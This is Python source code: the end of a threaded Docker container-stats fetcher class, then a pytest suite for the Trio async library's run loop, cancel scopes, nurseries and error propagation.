self.__pending_fetches = []
# The total number of containers in `__container_scoreboard` with value either `__PENDING` or `__IN_FLIGHT`.
self.__remaining_metrics_count = 0
# The number of worker threads blocked, waiting for a container to fetch its metrics.
self.__idle_workers_count = 0
def prefetch_metrics(self, container_id):
"""Initiates requesting invoking `stats` for the specified container. If you invoke this, you must
also eventually invoke `get_metrics` with the same container. By invoking this first, the `get_metrics`
call will take less time when issuing many `stats` requests.
Whenever possible, you should first invoke this method for all containers whose metrics you wish to request
before any call to `get_metrics`.
The behavior is not well defined if you invoke `prefetch_metrics` multiple times for a container before
invoking `get_metrics` for it.
@param container_id: The id of the container to fetch.
@type container_id: str
"""
self.__lock.acquire()
try:
if container_id not in self.__container_scoreboard:
self._add_fetch_task(container_id)
finally:
self.__lock.release()
def get_metrics(self, container_id):
"""Blocks until the `stats` call for the specified container is received. If `prefetch_metrics` was not
invoked already for this container, then the `stats` request will be issued.
@param container_id: The container whose metrics should be fetched.
@type container_id: str
@return The metrics for the container, or None if there was an error or if `stop` was invoked on this object.
@rtype JSON
"""
self.__lock.acquire()
try:
while True:
if self.__is_stopped:
return None
# Fetch the result if it was prefetched.
if container_id not in self.__container_scoreboard:
self._add_fetch_task(container_id)
status = self.__container_scoreboard[container_id]
if status is not self.__PENDING and status is not self.__IN_FLIGHT:
result = self.__container_scoreboard[container_id]
del self.__container_scoreboard[container_id]
return result
# Otherwise no result has been received yet.. wait..
self.__cv.wait()
finally:
self.__lock.release()
def stop(self):
"""Stops the fetcher. Any calls blocking on `get_metrics` will finish and return `None`. All threads
started by this instance will be stopped (though, this method does not wait on them to terminate).
"""
self.__lock.acquire()
try:
self.__is_stopped = True
# Notify all threads that may be waiting on a new container or waiting on a metric result that we have
# been stopped.
self.__cv.notifyAll()
finally:
self.__lock.release()
def idle_workers(self):
"""
Used for testing.
@return: The number of worker threads currently blocking, waiting for a container whose metrics need fetching.
@rtype: int
"""
self.__lock.acquire()
try:
return self.__idle_workers_count
finally:
self.__lock.release()
def _get_fetch_task(self):
"""Blocks until either there is a new container whose metrics need to be fetched or until this instance
is stopped.
@return: A tuple containing the container whose metrics should be fetched and a boolean indicating if the
instance has been stopped. If it has been stopped, the container will be None.
@rtype: (str, bool)
"""
self.__lock.acquire()
try:
while True:
if self.__is_stopped:
return None, True
if len(self.__pending_fetches) > 0:
container = self.__pending_fetches.pop(0)
self.__container_scoreboard[container] = self.__PENDING
self.__idle_workers_count -= 1
return container, False
self.__cv.wait()
finally:
self.__lock.release()
def __start_workers(self, count):
"""Start `count` worker threads that will fetch metrics results.
@param count: The number of threads to start.
@type count: int
"""
new_number_workers = min(self.__concurrency, count + self.__num_worker_threads)
for i in range(self.__num_worker_threads, new_number_workers):
x = threading.Thread(target=self.__worker)
# Set daemon so this thread does not need to be finished for the overall process to stop. This allows
# the process to terminate even if a `stats` request is still in-flight.
x.setDaemon(True)
x.start()
self.__num_worker_threads += 1
# For accounting purposes,we consider the thread idle until it actually has a container it is fetching.
self.__idle_workers_count += 1
def __worker(self):
"""The body for the worker threads.
"""
while True:
# Get the next container to fetch if there is one.
container_id, is_stopped = self._get_fetch_task()
if is_stopped:
return
result = None
try:
self.__logger.log(scalyr_logging.DEBUG_LEVEL_3,
'Attempting to retrieve metrics for cid=%s' % container_id)
result = self.__docker_client.stats(container=container_id, stream=False)
except Exception, e:
self.__logger.error("Error readings stats for '%s': %s\n%s" % (container_id, str(e),
traceback.format_exc()),
limit_once_per_x_secs=300, limit_key='api-stats-%s' % container_id)
self._record_fetch_result(container_id, result)
def _add_fetch_task(self, container_id):
"""Adds the specified container to the list of containers whose metrics will be fetched. Eventually, a worker
thread will grab this container and fetch its metrics.
IMPORTANT: callers must hold `__lock` when invoking this method.
@param container_id: The container whose metrics should be fetched.
@type container_id: str
"""
self.__remaining_metrics_count += 1
self.__container_scoreboard[container_id] = self.__PENDING
self.__pending_fetches.append(container_id)
# Notify any worker threads waiting for a container.
self.__cv.notifyAll()
# We need to spin up new worker threads if the amount of remaining metrics (PENDING or IN-FLIGHT) is greater
# than the number of threads we already have.
if self.__remaining_metrics_count > self.__num_worker_threads and self.__num_worker_threads < self.__concurrency:
self.__start_workers(self.__remaining_metrics_count - self.__num_worker_threads)
def _record_fetch_result(self, container_id, result):
"""Record that the `stats` result for the specified container. If there was an error, result should be
None.
@type container_id: str
@type result: JsonObject
"""
self.__lock.acquire()
try:
self.__container_scoreboard[container_id] = result
self.__remaining_metrics_count -= 1
# Since this is only invoked by a worker once their stats call is done, we know they are now idle.
self.__idle_workers_count += 1
# Wake up any thread that was waiting on this result.
self.__cv.notifyAll()
finally:
self.__lock.release()
|
test_run.py
|
import contextvars
import functools
import platform
import sys
import threading
import time
import types
import warnings
import weakref
from contextlib import contextmanager, ExitStack
from math import inf
from textwrap import dedent
import gc
import attr
import outcome
import sniffio
import pytest
from .tutil import (
slow,
check_sequence_matches,
gc_collect_harder,
ignore_coroutine_never_awaited_warnings,
buggy_pypy_asyncgens,
restore_unraisablehook,
create_asyncio_future_in_new_loop,
)
from ... import _core
from .._run import DEADLINE_HEAP_MIN_PRUNE_THRESHOLD
from ..._threads import to_thread_run_sync
from ..._timeouts import sleep, fail_after
from ...testing import (
wait_all_tasks_blocked,
Sequencer,
assert_checkpoints,
)
# slightly different from _timeouts.sleep_forever because it returns the value
# its rescheduled with, which is really only useful for tests of
# rescheduling...
async def sleep_forever():
return await _core.wait_task_rescheduled(lambda _: _core.Abort.SUCCEEDED)
def test_basic():
async def trivial(x):
return x
assert _core.run(trivial, 8) == 8
with pytest.raises(TypeError):
# Missing an argument
_core.run(trivial)
with pytest.raises(TypeError):
# Not an async function
_core.run(lambda: None)
async def trivial2(x):
await _core.checkpoint()
return x
assert _core.run(trivial2, 1) == 1
def test_initial_task_error():
async def main(x):
raise ValueError(x)
with pytest.raises(ValueError) as excinfo:
_core.run(main, 17)
assert excinfo.value.args == (17,)
def test_run_nesting():
async def inception():
async def main(): # pragma: no cover
pass
return _core.run(main)
with pytest.raises(RuntimeError) as excinfo:
_core.run(inception)
assert "from inside" in str(excinfo.value)
async def test_nursery_warn_use_async_with():
with pytest.raises(RuntimeError) as excinfo:
on = _core.open_nursery()
with on:
pass # pragma: no cover
excinfo.match(
r"use 'async with open_nursery\(...\)', not 'with open_nursery\(...\)'"
)
# avoid unawaited coro.
async with on:
pass
async def test_nursery_main_block_error_basic():
exc = ValueError("whoops")
with pytest.raises(ValueError) as excinfo:
async with _core.open_nursery():
raise exc
assert excinfo.value is exc
async def test_child_crash_basic():
exc = ValueError("uh oh")
async def erroring():
raise exc
try:
# nursery.__aexit__ propagates exception from child back to parent
async with _core.open_nursery() as nursery:
nursery.start_soon(erroring)
except ValueError as e:
assert e is exc
async def test_basic_interleave():
async def looper(whoami, record):
for i in range(3):
record.append((whoami, i))
await _core.checkpoint()
record = []
async with _core.open_nursery() as nursery:
nursery.start_soon(looper, "a", record)
nursery.start_soon(looper, "b", record)
check_sequence_matches(
record, [{("a", 0), ("b", 0)}, {("a", 1), ("b", 1)}, {("a", 2), ("b", 2)}]
)
def test_task_crash_propagation():
looper_record = []
async def looper():
try:
while True:
await _core.checkpoint()
except _core.Cancelled:
print("looper cancelled")
looper_record.append("cancelled")
async def crasher():
raise ValueError("argh")
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(looper)
nursery.start_soon(crasher)
with pytest.raises(ValueError) as excinfo:
_core.run(main)
assert looper_record == ["cancelled"]
assert excinfo.value.args == ("argh",)
def test_main_and_task_both_crash():
# If main crashes and there's also a task crash, then we get both in a
# MultiError
async def crasher():
raise ValueError
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
raise KeyError
with pytest.raises(_core.MultiError) as excinfo:
_core.run(main)
print(excinfo.value)
assert {type(exc) for exc in excinfo.value.exceptions} == {
ValueError,
KeyError,
}
def test_two_child_crashes():
async def crasher(etype):
raise etype
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher, KeyError)
nursery.start_soon(crasher, ValueError)
with pytest.raises(_core.MultiError) as excinfo:
_core.run(main)
assert {type(exc) for exc in excinfo.value.exceptions} == {
ValueError,
KeyError,
}
async def test_child_crash_wakes_parent():
async def crasher():
raise ValueError
with pytest.raises(ValueError):
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
await sleep_forever()
async def test_reschedule():
t1 = None
t2 = None
async def child1():
nonlocal t1, t2
t1 = _core.current_task()
print("child1 start")
x = await sleep_forever()
print("child1 woke")
assert x == 0
print("child1 rescheduling t2")
_core.reschedule(t2, outcome.Error(ValueError()))
print("child1 exit")
async def child2():
nonlocal t1, t2
print("child2 start")
t2 = _core.current_task()
_core.reschedule(t1, outcome.Value(0))
print("child2 sleep")
with pytest.raises(ValueError):
await sleep_forever()
print("child2 successful exit")
async with _core.open_nursery() as nursery:
nursery.start_soon(child1)
# let t1 run and fall asleep
await _core.checkpoint()
nursery.start_soon(child2)
async def test_current_time():
t1 = _core.current_time()
# Windows clock is pretty low-resolution -- appveyor tests fail unless we
# sleep for a bit here.
time.sleep(time.get_clock_info("perf_counter").resolution)
t2 = _core.current_time()
assert t1 < t2
async def test_current_time_with_mock_clock(mock_clock):
start = mock_clock.current_time()
assert mock_clock.current_time() == _core.current_time()
assert mock_clock.current_time() == _core.current_time()
mock_clock.jump(3.14)
assert start + 3.14 == mock_clock.current_time() == _core.current_time()
async def test_current_clock(mock_clock):
assert mock_clock is _core.current_clock()
async def test_current_task():
parent_task = _core.current_task()
async def child():
assert _core.current_task().parent_nursery.parent_task is parent_task
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
async def test_root_task():
root = _core.current_root_task()
assert root.parent_nursery is root.eventual_parent_nursery is None
def test_out_of_context():
with pytest.raises(RuntimeError):
_core.current_task()
with pytest.raises(RuntimeError):
_core.current_time()
async def test_current_statistics(mock_clock):
# Make sure all the early startup stuff has settled down
await wait_all_tasks_blocked()
# A child that sticks around to make some interesting stats:
async def child():
try:
await sleep_forever()
except _core.Cancelled:
pass
stats = _core.current_statistics()
print(stats)
# 2 system tasks + us
assert stats.tasks_living == 3
assert stats.run_sync_soon_queue_size == 0
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
token = _core.current_trio_token()
token.run_sync_soon(lambda: None)
token.run_sync_soon(lambda: None, idempotent=True)
stats = _core.current_statistics()
print(stats)
# 2 system tasks + us + child
assert stats.tasks_living == 4
# the exact value here might shift if we change how we do accounting
# (currently it only counts tasks that we already know will be
# runnable on the next pass), but still useful to at least test the
# difference between now and after we wake up the child:
assert stats.tasks_runnable == 0
assert stats.run_sync_soon_queue_size == 2
nursery.cancel_scope.cancel()
stats = _core.current_statistics()
print(stats)
assert stats.tasks_runnable == 1
# Give the child a chance to die and the run_sync_soon a chance to clear
await _core.checkpoint()
await _core.checkpoint()
with _core.CancelScope(deadline=_core.current_time() + 5):
stats = _core.current_statistics()
print(stats)
assert stats.seconds_to_next_deadline == 5
stats = _core.current_statistics()
print(stats)
assert stats.seconds_to_next_deadline == inf
async def test_cancel_scope_repr(mock_clock):
scope = _core.CancelScope()
assert "unbound" in repr(scope)
with scope:
assert "active" in repr(scope)
scope.deadline = _core.current_time() - 1
assert "deadline is 1.00 seconds ago" in repr(scope)
scope.deadline = _core.current_time() + 10
assert "deadline is 10.00 seconds from now" in repr(scope)
# when not in async context, can't get the current time
assert "deadline" not in await to_thread_run_sync(repr, scope)
scope.cancel()
assert "cancelled" in repr(scope)
assert "exited" in repr(scope)
def test_cancel_points():
async def main1():
with _core.CancelScope() as scope:
await _core.checkpoint_if_cancelled()
scope.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint_if_cancelled()
_core.run(main1)
async def main2():
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
_core.run(main2)
async def main3():
with _core.CancelScope() as scope:
scope.cancel()
with pytest.raises(_core.Cancelled):
await sleep_forever()
_core.run(main3)
async def main4():
with _core.CancelScope() as scope:
scope.cancel()
await _core.cancel_shielded_checkpoint()
await _core.cancel_shielded_checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
_core.run(main4)
async def test_cancel_edge_cases():
with _core.CancelScope() as scope:
# Two cancels in a row -- idempotent
scope.cancel()
scope.cancel()
await _core.checkpoint()
assert scope.cancel_called
assert scope.cancelled_caught
with _core.CancelScope() as scope:
# Check level-triggering
scope.cancel()
with pytest.raises(_core.Cancelled):
await sleep_forever()
with pytest.raises(_core.Cancelled):
await sleep_forever()
async def test_cancel_scope_multierror_filtering():
async def crasher():
raise KeyError
try:
with _core.CancelScope() as outer:
try:
async with _core.open_nursery() as nursery:
# Two children that get cancelled by the nursery scope
nursery.start_soon(sleep_forever) # t1
nursery.start_soon(sleep_forever) # t2
nursery.cancel_scope.cancel()
with _core.CancelScope(shield=True):
await wait_all_tasks_blocked()
# One child that gets cancelled by the outer scope
nursery.start_soon(sleep_forever) # t3
outer.cancel()
# And one that raises a different error
nursery.start_soon(crasher) # t4
# and then our __aexit__ also receives an outer Cancelled
except _core.MultiError as multi_exc:
# Since the outer scope became cancelled before the
# nursery block exited, all cancellations inside the
# nursery block continue propagating to reach the
# outer scope.
assert len(multi_exc.exceptions) == 5
summary = {}
for exc in multi_exc.exceptions:
summary.setdefault(type(exc), 0)
summary[type(exc)] += 1
assert summary == {_core.Cancelled: 4, KeyError: 1}
raise
except AssertionError: # pragma: no cover
raise
except BaseException as exc:
# This is outside the outer scope, so all the Cancelled
# exceptions should have been absorbed, leaving just a regular
# KeyError from crasher()
assert type(exc) is KeyError
else: # pragma: no cover
assert False
async def test_precancelled_task():
# a task that gets spawned into an already-cancelled nursery should begin
# execution (https://github.com/python-trio/trio/issues/41), but get a
# cancelled error at its first blocking call.
record = []
async def blocker():
record.append("started")
await sleep_forever()
async with _core.open_nursery() as nursery:
nursery.cancel_scope.cancel()
nursery.start_soon(blocker)
assert record == ["started"]
async def test_cancel_shielding():
with _core.CancelScope() as outer:
with _core.CancelScope() as inner:
await _core.checkpoint()
outer.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
assert inner.shield is False
with pytest.raises(TypeError):
inner.shield = "hello"
assert inner.shield is False
inner.shield = True
assert inner.shield is True
# shield protects us from 'outer'
await _core.checkpoint()
with _core.CancelScope() as innerest:
innerest.cancel()
# but it doesn't protect us from scope inside inner
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
await _core.checkpoint()
inner.shield = False
# can disable shield again
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# re-enable shield
inner.shield = True
await _core.checkpoint()
# shield doesn't protect us from inner itself
inner.cancel()
# This should now raise, but be absorbed by the inner scope
await _core.checkpoint()
assert inner.cancelled_caught
# make sure that cancellation propagates immediately to all children
async def test_cancel_inheritance():
record = set()
async def leaf(ident):
try:
await sleep_forever()
except _core.Cancelled:
record.add(ident)
async def worker(ident):
async with _core.open_nursery() as nursery:
nursery.start_soon(leaf, ident + "-l1")
nursery.start_soon(leaf, ident + "-l2")
async with _core.open_nursery() as nursery:
nursery.start_soon(worker, "w1")
nursery.start_soon(worker, "w2")
nursery.cancel_scope.cancel()
assert record == {"w1-l1", "w1-l2", "w2-l1", "w2-l2"}
async def test_cancel_shield_abort():
with _core.CancelScope() as outer:
async with _core.open_nursery() as nursery:
outer.cancel()
nursery.cancel_scope.shield = True
# The outer scope is cancelled, but this task is protected by the
# shield, so it manages to get to sleep
record = []
async def sleeper():
record.append("sleeping")
try:
await sleep_forever()
except _core.Cancelled:
record.append("cancelled")
nursery.start_soon(sleeper)
await wait_all_tasks_blocked()
assert record == ["sleeping"]
# now when we unshield, it should abort the sleep.
nursery.cancel_scope.shield = False
# wait for the task to finish before entering the nursery
# __aexit__, because __aexit__ could make it spuriously look like
# this worked by cancelling the nursery scope. (When originally
# written, without these last few lines, the test spuriously
# passed, even though shield assignment was buggy.)
with _core.CancelScope(shield=True):
await wait_all_tasks_blocked()
assert record == ["sleeping", "cancelled"]
async def test_basic_timeout(mock_clock):
start = _core.current_time()
with _core.CancelScope() as scope:
assert scope.deadline == inf
scope.deadline = start + 1
assert scope.deadline == start + 1
assert not scope.cancel_called
mock_clock.jump(2)
await _core.checkpoint()
await _core.checkpoint()
await _core.checkpoint()
assert not scope.cancel_called
start = _core.current_time()
with _core.CancelScope(deadline=start + 1) as scope:
mock_clock.jump(2)
await sleep_forever()
# But then the scope swallowed the exception... but we can still see it
# here:
assert scope.cancel_called
assert scope.cancelled_caught
# changing deadline
start = _core.current_time()
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.deadline = start + 10
await _core.checkpoint()
mock_clock.jump(5)
await _core.checkpoint()
scope.deadline = start + 1
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
async def test_cancel_scope_nesting():
# Nested scopes: if two triggering at once, the outer one wins
with _core.CancelScope() as scope1:
with _core.CancelScope() as scope2:
with _core.CancelScope() as scope3:
scope3.cancel()
scope2.cancel()
await sleep_forever()
assert scope3.cancel_called
assert not scope3.cancelled_caught
assert scope2.cancel_called
assert scope2.cancelled_caught
assert not scope1.cancel_called
assert not scope1.cancelled_caught
# shielding
with _core.CancelScope() as scope1:
with _core.CancelScope() as scope2:
scope1.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
scope2.shield = True
await _core.checkpoint()
scope2.cancel()
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# if a scope is pending, but then gets popped off the stack, then it
# isn't delivered
with _core.CancelScope() as scope:
scope.cancel()
await _core.cancel_shielded_checkpoint()
await _core.checkpoint()
assert not scope.cancelled_caught
# Regression test for https://github.com/python-trio/trio/issues/1175
async def test_unshield_while_cancel_propagating():
with _core.CancelScope() as outer:
with _core.CancelScope() as inner:
outer.cancel()
try:
await _core.checkpoint()
finally:
inner.shield = True
assert outer.cancelled_caught and not inner.cancelled_caught
async def test_cancel_unbound():
async def sleep_until_cancelled(scope):
with scope, fail_after(1):
await sleep_forever()
# Cancel before entry
scope = _core.CancelScope()
scope.cancel()
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_until_cancelled, scope)
# Cancel after entry
scope = _core.CancelScope()
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_until_cancelled, scope)
await wait_all_tasks_blocked()
scope.cancel()
# Shield before entry
scope = _core.CancelScope()
scope.shield = True
with _core.CancelScope() as outer, scope:
outer.cancel()
await _core.checkpoint()
scope.shield = False
with pytest.raises(_core.Cancelled):
await _core.checkpoint()
# Can't reuse
with _core.CancelScope() as scope:
await _core.checkpoint()
scope.cancel()
await _core.checkpoint()
assert scope.cancel_called
assert not scope.cancelled_caught
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
# Can't reenter
with _core.CancelScope() as scope:
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
# Can't enter from multiple tasks simultaneously
scope = _core.CancelScope()
async def enter_scope():
with scope:
await sleep_forever()
async with _core.open_nursery() as nursery:
nursery.start_soon(enter_scope, name="this one")
await wait_all_tasks_blocked()
with pytest.raises(RuntimeError) as exc_info:
with scope:
pass # pragma: no cover
assert "single 'with' block" in str(exc_info.value)
nursery.cancel_scope.cancel()
# If not yet entered, cancel_called is true when the deadline has passed
# even if cancel() hasn't been called yet
scope = _core.CancelScope(deadline=_core.current_time() + 1)
assert not scope.cancel_called
scope.deadline -= 1
assert scope.cancel_called
scope.deadline += 1
assert scope.cancel_called # never become un-cancelled
async def test_cancel_scope_misnesting():
outer = _core.CancelScope()
inner = _core.CancelScope()
with ExitStack() as stack:
stack.enter_context(outer)
with inner:
with pytest.raises(RuntimeError, match="still within its child"):
stack.close()
# No further error is raised when exiting the inner context
# If there are other tasks inside the abandoned part of the cancel tree,
# they get cancelled when the misnesting is detected
async def task1():
with pytest.raises(_core.Cancelled):
await sleep_forever()
# Even if inside another cancel scope
async def task2():
with _core.CancelScope():
with pytest.raises(_core.Cancelled):
await sleep_forever()
with ExitStack() as stack:
stack.enter_context(_core.CancelScope())
async with _core.open_nursery() as nursery:
nursery.start_soon(task1)
nursery.start_soon(task2)
await wait_all_tasks_blocked()
with pytest.raises(RuntimeError, match="still within its child"):
stack.close()
# Variant that makes the child tasks direct children of the scope
# that noticed the misnesting:
nursery_mgr = _core.open_nursery()
nursery = await nursery_mgr.__aenter__()
try:
nursery.start_soon(task1)
nursery.start_soon(task2)
nursery.start_soon(sleep_forever)
await wait_all_tasks_blocked()
nursery.cancel_scope.__exit__(None, None, None)
finally:
with pytest.raises(RuntimeError) as exc_info:
await nursery_mgr.__aexit__(*sys.exc_info())
assert "which had already been exited" in str(exc_info.value)
assert type(exc_info.value.__context__) is _core.MultiError
assert len(exc_info.value.__context__.exceptions) == 3
cancelled_in_context = False
for exc in exc_info.value.__context__.exceptions:
assert isinstance(exc, RuntimeError)
assert "closed before the task exited" in str(exc)
cancelled_in_context |= isinstance(exc.__context__, _core.Cancelled)
assert cancelled_in_context # for the sleep_forever
# Trying to exit a cancel scope from an unrelated task raises an error
# without affecting any state
async def task3(task_status):
with _core.CancelScope() as scope:
task_status.started(scope)
await sleep_forever()
async with _core.open_nursery() as nursery:
scope = await nursery.start(task3)
with pytest.raises(RuntimeError, match="from unrelated"):
scope.__exit__(None, None, None)
scope.cancel()
@slow
async def test_timekeeping():
# probably a good idea to use a real clock for *one* test anyway...
TARGET = 1.0
# give it a few tries in case of random CI server flakiness
for _ in range(4):
real_start = time.perf_counter()
with _core.CancelScope() as scope:
scope.deadline = _core.current_time() + TARGET
await sleep_forever()
real_duration = time.perf_counter() - real_start
accuracy = real_duration / TARGET
print(accuracy)
# Actual time elapsed should always be >= target time
# (== is possible depending on system behavior for time.perf_counter resolution
if 1.0 <= accuracy < 2: # pragma: no branch
break
else: # pragma: no cover
assert False
async def test_failed_abort():
stubborn_task = [None]
stubborn_scope = [None]
record = []
async def stubborn_sleeper():
stubborn_task[0] = _core.current_task()
with _core.CancelScope() as scope:
stubborn_scope[0] = scope
record.append("sleep")
x = await _core.wait_task_rescheduled(lambda _: _core.Abort.FAILED)
assert x == 1
record.append("woke")
try:
await _core.checkpoint_if_cancelled()
except _core.Cancelled:
record.append("cancelled")
async with _core.open_nursery() as nursery:
nursery.start_soon(stubborn_sleeper)
await wait_all_tasks_blocked()
assert record == ["sleep"]
stubborn_scope[0].cancel()
await wait_all_tasks_blocked()
# cancel didn't wake it up
assert record == ["sleep"]
# wake it up again by hand
_core.reschedule(stubborn_task[0], outcome.Value(1))
assert record == ["sleep", "woke", "cancelled"]
@restore_unraisablehook()
def test_broken_abort():
async def main():
# These yields are here to work around an annoying warning -- we're
# going to crash the main loop, and if we (by chance) do this before
# the run_sync_soon task runs for the first time, then Python gives us
# a spurious warning about it not being awaited. (I mean, the warning
# is correct, but here we're testing our ability to deliver a
# semi-meaningful error after things have gone totally pear-shaped, so
# it's not relevant.) By letting the run_sync_soon_task run first, we
# avoid the warning.
await _core.checkpoint()
await _core.checkpoint()
with _core.CancelScope() as scope:
scope.cancel()
# None is not a legal return value here
await _core.wait_task_rescheduled(lambda _: None)
with pytest.raises(_core.TrioInternalError):
_core.run(main)
# Because this crashes, various __del__ methods print complaints on
# stderr. Make sure that they get run now, so the output is attached to
# this test.
gc_collect_harder()
@restore_unraisablehook()
def test_error_in_run_loop():
# Blow stuff up real good to check we at least get a TrioInternalError
async def main():
task = _core.current_task()
task._schedule_points = "hello!"
await _core.checkpoint()
with ignore_coroutine_never_awaited_warnings():
with pytest.raises(_core.TrioInternalError):
_core.run(main)
async def test_spawn_system_task():
record = []
async def system_task(x):
record.append(("x", x))
record.append(("ki", _core.currently_ki_protected()))
await _core.checkpoint()
_core.spawn_system_task(system_task, 1)
await wait_all_tasks_blocked()
assert record == [("x", 1), ("ki", True)]
# intentionally make a system task crash
def test_system_task_crash():
async def crasher():
raise KeyError
async def main():
_core.spawn_system_task(crasher)
await sleep_forever()
with pytest.raises(_core.TrioInternalError):
_core.run(main)
def test_system_task_crash_MultiError():
async def crasher1():
raise KeyError
async def crasher2():
raise ValueError
async def system_task():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher1)
nursery.start_soon(crasher2)
async def main():
_core.spawn_system_task(system_task)
await sleep_forever()
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
me = excinfo.value.__cause__
assert isinstance(me, _core.MultiError)
assert len(me.exceptions) == 2
for exc in me.exceptions:
assert isinstance(exc, (KeyError, ValueError))
def test_system_task_crash_plus_Cancelled():
# Set up a situation where a system task crashes with a
# MultiError([Cancelled, ValueError])
async def crasher():
try:
await sleep_forever()
except _core.Cancelled:
raise ValueError
async def cancelme():
await sleep_forever()
async def system_task():
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
nursery.start_soon(cancelme)
async def main():
_core.spawn_system_task(system_task)
# then we exit, triggering a cancellation
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is ValueError
def test_system_task_crash_KeyboardInterrupt():
async def ki():
raise KeyboardInterrupt
async def main():
_core.spawn_system_task(ki)
await sleep_forever()
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert isinstance(excinfo.value.__cause__, KeyboardInterrupt)
# This used to fail because checkpoint was a yield followed by an immediate
# reschedule. So we had:
# 1) this task yields
# 2) this task is rescheduled
# ...
# 3) next iteration of event loop starts, runs timeouts
# 4) this task has timed out
# 5) ...but it's on the run queue, so the timeout is queued to be delivered
# the next time that it's blocked.
async def test_yield_briefly_checks_for_timeout(mock_clock):
with _core.CancelScope(deadline=_core.current_time() + 5):
await _core.checkpoint()
with pytest.raises(_core.Cancelled):
mock_clock.jump(10)
await _core.checkpoint()
# This tests that sys.exc_info is properly saved/restored as we swap between
# tasks. It turns out that the interpreter automagically handles this for us
# so there's no special code in Trio required to pass this test, but it's
# still nice to know that it works :-).
#
# Update: it turns out I was right to be nervous! see the next test...
async def test_exc_info():
record = []
seq = Sequencer()
async def child1():
with pytest.raises(ValueError) as excinfo:
try:
async with seq(0):
pass # we don't yield until seq(2) below
record.append("child1 raise")
raise ValueError("child1")
except ValueError:
record.append("child1 sleep")
async with seq(2):
pass
assert "child2 wake" in record
record.append("child1 re-raise")
raise
assert excinfo.value.__context__ is None
record.append("child1 success")
async def child2():
with pytest.raises(KeyError) as excinfo:
async with seq(1):
pass # we don't yield until seq(3) below
assert "child1 sleep" in record
record.append("child2 wake")
assert sys.exc_info() == (None, None, None)
try:
raise KeyError("child2")
except KeyError:
record.append("child2 sleep again")
async with seq(3):
pass
assert "child1 re-raise" in record
record.append("child2 re-raise")
raise
assert excinfo.value.__context__ is None
record.append("child2 success")
async with _core.open_nursery() as nursery:
nursery.start_soon(child1)
nursery.start_soon(child2)
assert record == [
"child1 raise",
"child1 sleep",
"child2 wake",
"child2 sleep again",
"child1 re-raise",
"child1 success",
"child2 re-raise",
"child2 success",
]
# Before CPython 3.9, using .throw() to raise an exception inside a
# coroutine/generator causes the original exc_info state to be lost, so things
# like re-raising and exception chaining are broken.
#
# https://bugs.python.org/issue29587
async def test_exc_info_after_yield_error():
child_task = None
async def child():
nonlocal child_task
child_task = _core.current_task()
try:
raise KeyError
except Exception:
try:
await sleep_forever()
except Exception:
pass
raise
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
_core.reschedule(child_task, outcome.Error(ValueError()))
# Similar to previous test -- if the ValueError() gets sent in via 'throw',
# then Python's normal implicit chaining stuff is broken.
async def test_exception_chaining_after_yield_error():
child_task = None
async def child():
nonlocal child_task
child_task = _core.current_task()
try:
raise KeyError
except Exception:
await sleep_forever()
with pytest.raises(ValueError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(child)
await wait_all_tasks_blocked()
_core.reschedule(child_task, outcome.Error(ValueError()))
assert isinstance(excinfo.value.__context__, KeyError)
async def test_nursery_exception_chaining_doesnt_make_context_loops():
async def crasher():
raise KeyError
with pytest.raises(_core.MultiError) as excinfo:
async with _core.open_nursery() as nursery:
nursery.start_soon(crasher)
raise ValueError
# the MultiError should not have the KeyError or ValueError as context
assert excinfo.value.__context__ is None
def test_TrioToken_identity():
async def get_and_check_token():
token = _core.current_trio_token()
# Two calls in the same run give the same object
assert token is _core.current_trio_token()
return token
t1 = _core.run(get_and_check_token)
t2 = _core.run(get_and_check_token)
assert t1 is not t2
assert t1 != t2
assert hash(t1) != hash(t2)
async def test_TrioToken_run_sync_soon_basic():
record = []
def cb(x):
record.append(("cb", x))
token = _core.current_trio_token()
token.run_sync_soon(cb, 1)
assert not record
await wait_all_tasks_blocked()
assert record == [("cb", 1)]
def test_TrioToken_run_sync_soon_too_late():
token = None
async def main():
nonlocal token
token = _core.current_trio_token()
_core.run(main)
assert token is not None
with pytest.raises(_core.RunFinishedError):
token.run_sync_soon(lambda: None) # pragma: no branch
async def test_TrioToken_run_sync_soon_idempotent():
record = []
def cb(x):
record.append(x)
token = _core.current_trio_token()
token.run_sync_soon(cb, 1)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 1, idempotent=True)
token.run_sync_soon(cb, 2, idempotent=True)
token.run_sync_soon(cb, 2, idempotent=True)
await wait_all_tasks_blocked()
assert len(record) == 3
assert sorted(record) == [1, 1, 2]
# ordering test
record = []
for _ in range(3):
for i in range(100):
token.run_sync_soon(cb, i, idempotent=True)
await wait_all_tasks_blocked()
